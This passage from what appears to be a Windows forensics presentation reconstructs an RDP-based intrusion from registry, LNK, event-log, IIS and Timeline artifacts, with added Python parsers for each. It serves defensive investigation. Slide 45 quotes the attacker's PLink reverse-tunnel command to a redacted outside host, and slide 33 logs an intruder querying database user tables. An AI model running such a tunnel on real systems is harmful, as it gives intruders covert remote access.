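The slide contrasts two sets of timestamps: the filesystem creation time of result.txt.lnk (when Explorer first opened the file) and the MAC times embedded in the LNK, which describe the target as it looked at that moment. The following is an added example, not code from the presentation or from lnkparse.py: it parses the fixed 76-byte ShellLinkHeader defined in MS-SHLLINK and converts the embedded FILETIME values to UTC. The sample header is constructed inline to mirror the result.txt case (target timestamps 2019-01-22 01:36:23 UTC, a constructed size of 1234 bytes); the variable-length structures that follow the header (LinkTargetIDList, LinkInfo, StringData, where the target path lives) are not decoded here.

```python
import struct
from datetime import datetime, timedelta, timezone

# ShellLinkHeader (MS-SHLLINK 2.1): fixed 76-byte structure, little-endian.
HEADER_FMT = "<I16sIIQQQIIIHHII"
HEADER_SIZE = struct.calcsize(HEADER_FMT)                       # 76 (0x4C)
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

LINK_FLAGS = {0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
              0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
              0x40: "HasIconLocation", 0x80: "IsUnicode"}
FILE_ATTRS = {0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM", 0x10: "DIRECTORY",
              0x20: "ARCHIVE", 0x80: "NORMAL"}


def filetime_to_datetime(ft):
    """FILETIME = 100 ns ticks since 1601-01-01 UTC; 0 means 'not set'."""
    if ft == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return int((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def _flags(value, table):
    return [name for bit, name in table.items() if value & bit]


def parse_lnk_header(data):
    """Decode the ShellLinkHeader at the start of a .lnk file.

    Only the fixed header is parsed; the target path lives in the variable
    structures that follow it and is out of scope for this example.
    """
    if len(data) < HEADER_SIZE:
        raise ValueError("data shorter than a ShellLinkHeader")
    (size, clsid, flags, attrs, ctime, atime, wtime,
     fsize, _icon, show_cmd, _hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Windows shell link: bad HeaderSize or LinkCLSID")
    return {
        "link_flags": _flags(flags, LINK_FLAGS),
        "attributes": _flags(attrs, FILE_ATTRS),
        # These three timestamps describe the *target* as it was when the
        # link was written, not the .lnk file's own filesystem times.
        "creation_time": filetime_to_datetime(ctime),
        "access_time": filetime_to_datetime(atime),
        "write_time": filetime_to_datetime(wtime),
        "file_size": fsize,            # low 32 bits of the target size
        "show_command": show_cmd,
    }


def build_lnk_header(target_time, file_size, attrs=0x20):
    """Constructed sample header whose target timestamps all equal target_time."""
    ft = datetime_to_filetime(target_time)
    flags = 0x01 | 0x02 | 0x80         # HasLinkTargetIDList | HasLinkInfo | IsUnicode
    return struct.pack(HEADER_FMT, HEADER_SIZE, LINK_CLSID, flags, attrs,
                       ft, ft, ft, file_size, 0, 1, 0, 0, 0, 0)


# Constructed stand-in for result.txt.lnk: target created/modified/accessed
# 2019-01-22 01:36:23 UTC as in the case study; size 1234 is made up.
SAMPLE_LNK = build_lnk_header(datetime(2019, 1, 22, 1, 36, 23, tzinfo=timezone.utc), 1234)

if __name__ == "__main__":
    for key, value in parse_lnk_header(SAMPLE_LNK).items():
        print(f"{key:>14}: {value}")
```

Compare the parsed write_time against the .lnk file's own creation time from the filesystem (01:39:23 on the slide): the gap between the two is the interval between the target being written and the user opening it in Explorer.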
  • 19. 19 Most Recently Used (MRU) Keys
  “RecentDocs”
  - Recently opened files
  - Multiple Subkeys for file types: .ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc.
  HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
  § Binary Format
  § Stores most recent 10 opened files
  Key Last Write       Registry Key                                                     Parsed MRU Value
  2019-01-22 01:36:23  Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt  0 = result.txt
  2019-01-22 01:35:34  Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip  0 = omg.zip
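The RecentDocs key and its per-extension subkeys are binary: numbered values each begin with the opened file's name in UTF-16LE, and the MRUListEx value is a list of DWORD indices, most recent first, terminated by 0xFFFFFFFF. The following parser is an added example, not the presenter's code: given the raw values of one RecentDocs (sub)key it returns the files in MRU order, which is how the "0 = result.txt" column on the slide is produced. The sample values are constructed inline; the shell item that follows the name in a real value is reduced here to the ASCII name of the matching .lnk file, which is the part this example extracts.

```python
import re
import struct

LNK_NAME_RE = re.compile(rb"[\x20-\x7e]+\.lnk")


def parse_mrulistex(data):
    """MRUListEx: little-endian DWORD value indices, most recent first,
    terminated by 0xFFFFFFFF. Trailing partial DWORDs are ignored."""
    order = []
    for (idx,) in struct.iter_unpack("<I", data[: len(data) - len(data) % 4]):
        if idx == 0xFFFFFFFF:
            break
        order.append(idx)
    return order


def parse_recentdocs_value(data):
    """A RecentDocs value starts with the UTF-16LE file name (NUL terminated),
    followed by a shell item naming the matching .lnk in the Recent folder."""
    end = 0
    while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
        end += 2                      # scan on UTF-16 code-unit boundaries
    name = data[:end].decode("utf-16-le")
    match = LNK_NAME_RE.search(data[end + 2:])
    return name, (match.group(0).decode("ascii") if match else None)


def recent_docs_order(values):
    """values: {value name: raw bytes} for one RecentDocs key or subkey.
    Returns [(file name, .lnk name)] in MRU order. Index 0 of MRUListEx is the
    entry whose addition set the key's LastWrite time."""
    out = []
    for idx in parse_mrulistex(values["MRUListEx"]):
        raw = values.get(str(idx))
        if raw is not None:
            out.append(parse_recentdocs_value(raw))
    return out


def _make_value(name, lnk_name):
    """Constructed value. Real entries carry a full shell item after the name;
    only the ASCII .lnk name inside it is reproduced here."""
    shell_item = b"\x2a\x00\x32\x00" + b"\x00" * 10 + lnk_name.encode("ascii") + b"\x00"
    return name.encode("utf-16-le") + b"\x00\x00" + shell_item


# Constructed stand-in for a RecentDocs key: value 1 (result.txt) was added
# after value 0 (omg.zip), so MRUListEx lists index 1 first.
SAMPLE_RECENTDOCS = {
    "MRUListEx": struct.pack("<III", 1, 0, 0xFFFFFFFF),
    "0": _make_value("omg.zip", "omg.zip.lnk"),
    "1": _make_value("result.txt", "result.txt.lnk"),
}

if __name__ == "__main__":
    for rank, (name, lnk) in enumerate(recent_docs_order(SAMPLE_RECENTDOCS)):
        print(rank, "=", name, "->", lnk)
```

Because only the key's LastWrite time is recorded, the timestamp can be tied to the entry at MRUListEx index 0 alone; the other entries only carry ordering, which is why the slide pairs each subkey's LastWrite time with its "0 =" value.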
  • 20. 20 Anatomy of a Registry Key
  Example: Run key
  Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Value Name: NotMalware
  Value Data: C:\ProgramData\TotallyMalwareEvil.exe
  • 21. 21 Anatomy of a Registry Key
  Example: Run key
  Key Last Modified: 2017-06-05 19:33:51
  § Values inherit Last Modified time from their parent key
  • 22. 22 Registry Timestamps
  A timestamp is applied to the ‘Key’, and is updated when…
  1) Key created
  2) Value created/deleted
  3) Data of any Value is modified
  Note: Registry timestamps can be modified, although this is not very common
  • 23. 23 Evidence of Execution
  Artifact         Default Enabled     User Agnostic   All Windows Versions   Execution Visibility
  ShimCache        Yes                 Yes             Yes                    Yes
  AmCache          Yes                 Yes             No                     Yes
  UserAssist       Yes                 No              Yes                    GUI only
  MUICache         Yes                 No              Yes                    GUI only
  Prefetch         Workstations only   Yes             Yes                    Yes
  Windows Events   No                  Yes             Yes                    Yes
  WMI RUA          No                  Yes             Yes                    Yes
  • 24. 24 UserAssist and MUICache
  Tracks files opened in Windows Explorer
  HKCU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
  HKCU\{SID}\Software\Microsoft\Windows\ShellNoRoam\MUICache
  UserAssist
  - One value per executable file
  • ROT13 encoded
  - Number of times each program ran
  - Last execution time
  MUICache
  - One value per executable file
  • Clear-text
  - Records “FileDescription” for PE files
  • 25. 25 UserAssist Evidence
  Raw contents of UserAssist key / Decoded UserAssist data (RegRipper userassist plugin output):
  userassist v.20080726
  (NTUSER.DAT) Displays contents of UserAssist Active Desktop key
  UserAssist (Active Desktop)
  Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
  LastWrite Time Fri Jul 29 21:46:41 2011 (UTC)
  Fri Jul 29 21:46:41 2017 (UTC)
    UEME_RUNPATH (3)
    UEME_RUNPATH:C:\Program Files\7-Zip\7zFM.exe (1)
  Fri Jul 29 21:46:17 2017 (UTC)
    UEME_RUNPATH:C:\Program Files\Windows NT\Accessories\WORDPAD.EXE (1)
  Fri Jul 29 21:44:45 2017 (UTC)
    UEME_RUNPIDL:%csidl2%\Internet Explorer.lnk (15)
    UEME_RUNPATH:C:\Program Files\Internet Explorer\IEXPLORE.EXE (1)
  • 27. 27 Decoded User Assist Data
  Key Last Write       Registry Key                                              Times Executed
  2019-01-22 01:36:23  {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\msiexec.exe        1
  2019-01-22 01:33:48  {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ServerManager.exe  1
  2019-01-22 01:39:23  C:\Users\dave\Desktop\omg.exe                             1
  2019-01-22 01:43:23  {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc         1
  2019-01-22 01:44:56  {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe           1
  2019-01-22 02:28:01  {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe          3
  • 28. 28 Jump Lists
  § Provides user quick access to recently used apps
  § Each user has their own jump lists
  § Shows evidence of accessed resources
  § Two types of jump lists
  § Requires parsing to be human readable
  - JumpListParser, JLECmd, jmp
  Automatic  %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations
  Custom     %APPDATA%\Microsoft\Windows\Recent\CustomDestinations
  • 29. 29 Jump Lists
  § Automatic – created automatically when a user interacts with a resource
  § Custom – created when a user “pins” an item
  • 30. 30 Browser History, Cache, and Downloads
  § User Specific Artifact
  § Enumerate Browsers
  § Extract Browsing History
  § Collect Browser Cache
  § Collect Downloaded Files
  • 31. 31 Web Server Side Data - Logging GET vs. POST
  GET Requests
  - “Retrieve” content specified in the request address
  - Key-value pairs passed as part of URI
  - Fully captured in logs (cs-uri-query)
  POST Requests
  - Tell the server to accept the data enclosed in the packet contents
  - Key-value pairs passed in the message body
  - Request parameters not logged
  Impact: Malicious activity in POST requests can be hard to detect!
  • 32. 32 Web Server Side Data - Content Encoding
  § Special characters in HTTP requests are URL Encoded by the web browser
  - % followed by the character's ASCII code in hexadecimal
  - Spaces can be represented by %20 or +
  http://www.foo.com/search.aspx?name=John & Mark Co.&op=1
  …is converted to (and will be logged as)…
  http://www.foo.com/search.aspx?name=John%20%26%20Mark%20Co.&op=1
  • 33. 33 Web server log excerpt
  GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG"
  GET /images/Schema.asp
  GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
  GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS"
  GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
  GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
  GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_USERS"&
  GET /images/Connect.asp
  GET /images/Schema.asp
  GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM>_USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A=
  GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
  POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
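Slides 31 to 33 make two points an analyst has to handle when reading IIS logs: cs-uri-query is URL-encoded and must be decoded before the table names and filters become readable, and POST requests such as the final Command.asp line show no parameters at all because IIS does not log the request body. The following is an added example, not code from the presentation: it parses W3C-format IIS log text by its #Fields header, decodes each query, and pulls out the sqlfrom/sqlwhere parameters that the 1ClickDB-style pages above carry, flagging POSTs whose parameters are invisible. The log lines and the table name REWARDS_USERS are constructed stand-ins for the redacted <SYSTEM> values on the slide.

```python
from urllib.parse import unquote_plus


def parse_iis_log(text):
    """Parse W3C-format IIS log text into dicts keyed by the #Fields names.
    IIS writes '-' for an empty field, so that marker is preserved as-is."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue                      # other directives, blank lines
        elif fields:
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def decode_query(cs_uri_query):
    """Decode cs-uri-query back into the key/value pairs the browser sent.
    Empty values are kept (parse_qs would drop them) because an empty
    sqlwhere_A is itself informative: no filter was applied."""
    if cs_uri_query in ("", "-"):
        return {}
    pairs = {}
    for part in cs_uri_query.split("&"):
        key, _, value = part.partition("=")
        pairs[unquote_plus(key)] = unquote_plus(value)
    return pairs


def summarize_db_access(records, app_prefix="/images/"):
    """One row per request to the database front-end pages: which table was
    named and which filter was used. POSTs get a note because the body, where
    their parameters travel, is not in the log."""
    rows = []
    for r in records:
        if not r["cs-uri-stem"].startswith(app_prefix):
            continue
        q = decode_query(r.get("cs-uri-query", "-"))
        rows.append({
            "time": f"{r['date']} {r['time']}",
            "client": r["c-ip"],
            "method": r["cs-method"],
            "page": r["cs-uri-stem"],
            "table": q.get("sqlfrom_A") or q.get("sqlfrom") or None,
            "filter": q.get("sqlwhere_A") or q.get("sqlwhere") or None,
            "note": "body not logged" if r["cs-method"] == "POST" else None,
        })
    return rows


# Constructed log excerpt in IIS W3C format; queries are encoded as IIS
# records them, table names are stand-ins for the redacted <SYSTEM> values.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-01-22 01:45:33 GET /images/Connect.asp - 192.168.1.101 200
2019-01-22 01:46:02 GET /images/Browse.asp sqlorderby_A=%22log_id%22+DESC&sqlfrom_A=%22dbo%22.%22REWARDS_LOG%22 192.168.1.101 200
2019-01-22 01:47:15 GET /images/Browse.asp sqlorderby_A=&sqlwhere_A=%28%22email%22+Like+%27NAME2%40EMAIL.com%25%27%29&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A=%22dbo%22.%22REWARDS_USERS%22 192.168.1.101 200
2019-01-22 01:52:40 GET /images/Edit.asp sqlid=1989&sqlfrom=%22dbo%22.%22REWARDS_USERS%22 192.168.1.101 200
2019-01-22 02:30:12 POST /images/Command.asp nocache=1%2F22%2F2019+2%3A30%3A12+AM 192.168.1.101 200
2019-01-22 02:31:00 GET /index.html - 10.0.0.7 200
"""

if __name__ == "__main__":
    for row in summarize_db_access(parse_iis_log(SAMPLE_LOG)):
        print(row["time"], row["method"], row["page"], row["table"], row["filter"], row["note"] or "")
```

The decoded filter for the third request reads back exactly as the slide shows it, ("email" Like 'NAME2@EMAIL.com%'), which is the form worth searching for across the whole log once one such request has been found.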
  • 34. 34 What do we know so far?
  Time                 Source              Details
  2019-01-22 01:33:23  EventLog            Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
  2019-01-22 01:33:23  EventLog            Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
  2019-01-22 01:35:34  Registry:LastWrite  Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
  2019-01-22 01:39:03  LNK:Create Time     C:\Users\dave\Desktop\results.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
  2019-01-22 01:39:23  FN:Create Time      C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
  2019-01-22 01:39:23  Registry:LastWrite  Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
  2019-01-22 01:39:23  UserAssist:Dave     C:\Users\dave\Desktop\omg.exe
  2019-01-22 01:43:23  UserAssist:Dave     {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
  2019-01-22 01:44:56  UserAssist:Dave     {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
  2019-01-22 01:45:33  IE:BrowserCache     Earliest Browser Cache Artifact Created
  2019-01-22 02:28:01  UserAssist:Dave     {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
  2019-01-22 02:30:12  IE:BrowserCache     Most Recent Browser Artifact Modified
  2019-01-22 02:39:45  EventLog            Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
  2019-01-22 02:39:45  EventLog            Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
  § What next?
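The table above is built by bounding the profile artifacts (RecentDocs, LNK, UserAssist, browser cache) with the RDP session events from slide 14: EID 21 opens session 2 for rewards\dave at 01:33:23 and EID 23/24 close it at 02:39:45, so everything in dave's profile between those times belongs to that remote interactive session from 192.168.1.101. The code below is an added example, not the presenter's tooling, that does this correlation mechanically: it pairs 21 with the first later 23 or 24 for the same account and Session ID, then attributes each artifact to the session whose window contains it. One caveat on channels: EID 1149 is written to TerminalServices-RemoteConnectionManager/Operational, while 21, 23 and 24 come from TerminalServices-LocalSessionManager/Operational, so both logs are needed. The events and artifacts are constructed inline from the slide's values, plus one deliberately out-of-window artifact.

```python
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional

FMT = "%Y-%m-%d %H:%M:%S"


@dataclass
class RdpSession:
    user: str
    session_id: int
    source: str
    logon: datetime
    logoff: Optional[datetime] = None
    artifacts: list = field(default_factory=list)


def _t(s):
    return datetime.strptime(s, FMT)


def reconstruct_sessions(events):
    """Pair EID 21 (session logon) with the first later EID 23/24 (logoff or
    disconnect) for the same user and Session ID. EID 1149 only records a
    successful authentication, so it never opens a session here."""
    sessions, open_by_key = [], {}
    for ev in sorted(events, key=lambda e: _t(e["time"])):
        key = (ev["user"].lower(), ev.get("session_id"))
        if ev["eid"] == 21:
            s = RdpSession(ev["user"], ev["session_id"], ev.get("source", "?"), _t(ev["time"]))
            sessions.append(s)
            open_by_key[key] = s
        elif ev["eid"] in (23, 24) and key in open_by_key:
            open_by_key.pop(key).logoff = _t(ev["time"])
    return sessions


def attribute_artifacts(sessions, artifacts):
    """Place each profile artifact inside the session of the same account
    whose logon..logoff window contains its timestamp; return a merged timeline."""
    timeline = []
    for a in sorted(artifacts, key=lambda x: _t(x["time"])):
        when, owner = _t(a["time"]), a["user"].lower()
        match = None
        for s in sessions:
            sam = s.user.split("\\")[-1].lower()     # 'rewards\dave' -> 'dave'
            if sam == owner and s.logon <= when and (s.logoff is None or when <= s.logoff):
                match = s
                break
        if match:
            match.artifacts.append(a)
        label = f"{match.user} session {match.session_id} from {match.source}" if match else None
        timeline.append({"time": a["time"], "source": a["source"],
                         "detail": a["detail"], "session": label})
    return timeline


# Constructed from slide 14's RDP events.
SAMPLE_EVENTS = [
    {"time": "2019-01-22 01:33:23", "eid": 1149, "user": "rewards\\dave", "source": "192.168.1.101"},
    {"time": "2019-01-22 01:33:23", "eid": 21, "user": "rewards\\dave", "session_id": 2, "source": "192.168.1.101"},
    {"time": "2019-01-22 02:39:45", "eid": 23, "user": "rewards\\dave", "session_id": 2},
    {"time": "2019-01-22 02:39:45", "eid": 24, "user": "rewards\\dave", "session_id": 2, "source": "192.168.1.101"},
]

# Constructed from the timeline table; the last entry is a made-up artifact
# after the session ended, to show that it is left unattributed.
SYS32 = "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}"
SAMPLE_ARTIFACTS = [
    {"time": "2019-01-22 01:35:34", "user": "dave", "source": "Registry:LastWrite", "detail": "RecentDocs\\.zip -> omg.zip"},
    {"time": "2019-01-22 01:39:23", "user": "dave", "source": "UserAssist", "detail": "C:\\Users\\dave\\Desktop\\omg.exe"},
    {"time": "2019-01-22 01:44:56", "user": "dave", "source": "UserAssist", "detail": SYS32 + "\\dsac.exe"},
    {"time": "2019-01-22 01:45:33", "user": "dave", "source": "IE:BrowserCache", "detail": "earliest cache entry created"},
    {"time": "2019-01-22 02:28:01", "user": "dave", "source": "UserAssist", "detail": SYS32 + "\\mstsc.exe"},
    {"time": "2019-01-22 03:10:00", "user": "dave", "source": "UserAssist", "detail": "constructed: after session ended"},
]

if __name__ == "__main__":
    sessions = reconstruct_sessions(SAMPLE_EVENTS)
    for row in attribute_artifacts(sessions, SAMPLE_ARTIFACTS):
        print(row["time"], row["source"].ljust(20), row["detail"], "|", row["session"] or "no session")
```

An artifact that falls outside every session window is the interesting case: either another interactive path (console, screen sharing, PsExec, the Type 2 logons from slide 12) was used, or the event log has a gap, and both are worth a second look before the timeline is written up.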
  • 36. 36 RDP Event Logs
  Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
  Date & Time          EID   Message
  2018-12-24 23:11:21  1149  Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
  2019-01-22 00:23:33  1149  Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
  • 38. 38 RDP MRU Keys
  Key Last Write       Registry Key
  2018-12-25 00:00:23  Hostname: 192.168.1.38 User: rewards\ITAdmin
  2018-12-25 00:33:42  Hostname: RewardsDB User: rewards\DBO
  2019-01-01 02:53:11  Hostname: Webserver2 User: rewards\frank
  2019-01-15 00:15:01  Hostname: ITJumpserver User: rewards\dave
  • 39. 39 RDP Bitmap Cache Files
  § Store frequently used images used during RDP session
  § Improves user experience
  § Located at:
  - C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache2.bmc
  - C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\Cache[0-9]{4}.bin
  • 41. 41 Uninstall or Disable Endpoint Agents
  • 42. 42 Registry Shellbags
  § Windows Explorer usage
  § Records size, position, view of windows
  § Provides evidence of user access to local & remote directories
  HKEY_USERS\{SID}\Software\Microsoft\Windows\Shell
  HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam
  \Users\<username>\AppData\Local\Microsoft\Windows\USRCLASS.DAT (Windows Vista/2008+)
  • 43. 43 Registry Shellbags
  Decoded shellbag keys can provide
  - Paths to directories accessed via Explorer
  - Date and time at which last access occurred
  - MAC times of each path tracked in shellbags
  Decoding tools
  - RegRipper
  - shellbags.py github.com/williballenthin/shellbags
  - ShellBagsExplorer • https://ericzimmerman.github.io/#!index.md
  • 44. 44 ShellBags
  MRU Time             Modified             Accessed             Created              Resource
  2019-01-11 03:51:36  2018-12-30 02:59:32  2016-12-30 02:59:32  2017-11-05 14:40:54  My Computer\C:\Users\ITAdmin [Desktop\0\0\4\3]
  2019-01-11 03:51:54  2018-05-07 15:54:36  2016-11-05 14:40:54  2017-11-05 14:40:54  My Computer\C:\Users\ITAdmin\AppData [Desktop\0\0\4\3\0]
                                                                                      My Network Places\hqdc1.com\hqdc1.com\general [Desktop\2\4\0]
  2018-12-25 02:40:59  2012-11-11 17:00:06  2012-11-11 17:00:06  2012-11-11 17:00:06  My Network Places\hqdc1.com\hqdc1.com\general\DC01 [Desktop\2\4\0\0]
  2018-12-25 02:40:59  2014-05-23 21:53:24  2018-05-23 21:53:24  2011-04-07 12:28:28  My Network Places\hqdc1.com\hqdc1.com\general\DC01\ITIO Server Infrastructure [
  2019-01-12 03:41:41  2017-01-10 14:07:12  2017-01-10 14:07:12  2017-05-02 13:45:42  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop [Desktop\2\9\0\0\0\0]
  2019-01-12 03:42:22  2017-01-11 18:42:04  2017-01-11 18:42:04  2017-01-10 14:06:56  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop\2\9\0\0\0\0\0]
  2019-01-12 03:47:49  2017-01-05 21:37:52  2017-01-05 21:37:52  2017-01-05 20:05:26  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop\2\9\0\0\0\0\1]
  2019-01-12 03:41:42  2016-12-18 14:49:14  2016-12-18 14:49:14  2015-01-26 19:43:56  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop\2\9\0\0\0\0\2]
  2019-01-12 03:53:14  2016-12-15 20:57:58  2016-12-15 20:57:58  2016-11-24 22:18:00  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop\2\9\0\0\0\0\3]
  2019-01-12 03:53:47  2015-09-23 13:52:10  2015-09-23 13:52:10  2016-05-02 13:45:42  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData [Desktop\2\9\0\0\0\1]
  2019-01-11 03:46:21  2016-09-27 13:38:42  2016-09-27 13:38:42  2016-05-02 13:45:42  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop\2\9\0\0\0\1\0]
  • 45. 45 How did the attacker access the host?
  § Remotely installed ScreenConnect
  § Switched Tactics and removed ScreenConnect/Installed malware
  § Non-Interactive malware used to download and execute PLink.exe to create tunnel
  - tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389
  § Connected to local host using remote desktop
  Key                                     Value               Data
  Software\SimonTatham\PuTTY\SshHostKeys  rsa2@<IP Address>   0x10001,0x SSH Public Key
  • 46. 46 Windows 10 Timeline
  § Timeline exists in Task View
  - Accessed by hitting Win+Tab
  § Records timeline of user activity for specific applications
  § User Engaged
  § Generic Events
  § Database location:
  - C:\Users\User\AppData\Local\ConnectedDevicesPlatform\L.User\ActivitiesCache.db
  • 49. 49 Windows Timeline
  § Parsing
  - Multiple Available Tools
  • https://tzworks.net/prototype_page.php?proto_id=41
  • https://github.com/log2timeline/plaso/pull/2076
  • https://ericzimmerman.github.io/#!index.md
  - SQLite3
  • 50. 50 Windows 10 Timeline
  Start - UTC          End - UTC            Application              DisplayText or Type                      Details
  2019-02-08 23:04:27  N/A                  WinRAR\WinRAR.exe        sdl-redline.zip                          Z:\Downloads\sdl-redline.zip
  2019-02-09 01:07:06  N/A                  Cisco.AnyConnect         Cisco AnyConnect Secure Mobility Client   black
  2019-02-10 13:09:53  N/A                  Microsoft.MicrosoftEdge  cmd - Bing                               https://www.bing.com/search?q=cmd&form=WNSGPH http://adaptivecards[.]io/schemas/adaptive-card.json
  2019-02-10 13:10:34  2019-02-10 13:10:51  Microsoft.MicrosoftEdge  UserEngaged                              https://ericzimmerman.github.io/#!index.md
  2019-02-12 13:58:46  2019-02-12 13:58:48  Microsoft.MicrosoftEdge  UserEngaged                              https://www.google.com/search?eiadd+on+vpn&oq=add+on+vpn
  2019-02-12 13:59:02  N/A                  Wireshark\Wireshark.exe  Wireshark                                black
  2019-02-12 18:57:11  N/A                  Wireshark\Wireshark.exe  107.x.x.x-10.24.206.133-1552495684.flow  Z:\Downloads\107.x.x.x-10.24.206.133-1552495684.flow
  2019-02-12 19:02:27  N/A                  Wireshark\Wireshark.exe  104.x.x.x-10.222.7.44-1552442420.flow    Z:\Downloads\104.x.x.x-10.222.7.44-1552442420.flow
  2019-02-16 00:47:42  N/A                  Microsoft.MSPaint        Paint 3D                                 black
  2019-02-16 00:50:34  N/A                  Microsoft.MSPaint        Picture2.jpg                             Z:\Desktop\Picture2.jpg
  2019-02-16 03:16:13  N/A                  mspaint.exe              Picture1.png                             Z:\Presentations\DFIR\Picture1.png
  2019-02-16 03:16:56  N/A                  mspaint.exe              Picture2.png                             Z:\Presentations\DFIR\Picture2.png
  2019-02-16 18:41:00  N/A                  WinRAR\WinRAR.exe        4mXTuLp5E19cNdVvUX9jzb.zip               Z:\Downloads\TuLp5E19cNdVvUX9jzb.zip
  2019-02-16 18:41:33  N/A                  Redline\Redline.exe      MBP0074.mans                             Z:\MBP0074.mans
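Slides 46 to 50 point out that ActivitiesCache.db is plain SQLite and can be read without a dedicated tool. The following is an added example, not code from the presentation or from the parsers listed on slide 49: it builds an in-memory stand-in for the Activity table with a constructed subset of the real columns (AppId, ActivityType, StartTime, EndTime, Payload; the production table has many more), inserts three rows modelled on the table above, and queries them into the same Start/End/Application/Text/Details layout. Two assumptions are labelled in the code: the ActivityType mapping (5 = ExecutionActivity, 6 = UserEngaged, as community parsers document it) and the payload keys this example reads (displayText, contentUri, type), since the JSON payload differs per activity type.

```python
import json
import sqlite3
from datetime import datetime, timezone

# Assumption: ActivityType values as documented by community parsers; anything
# else is reported as "Type N" rather than guessed.
ACTIVITY_TYPES = {5: "ExecutionActivity", 6: "UserEngaged"}

# Constructed subset of the real Activity table's columns.
SCHEMA = """
CREATE TABLE Activity (
    Id BLOB, AppId TEXT, ActivityType INT, StartTime INT, EndTime INT,
    LastModifiedTime INT, Payload BLOB
)"""


def _epoch(*parts):
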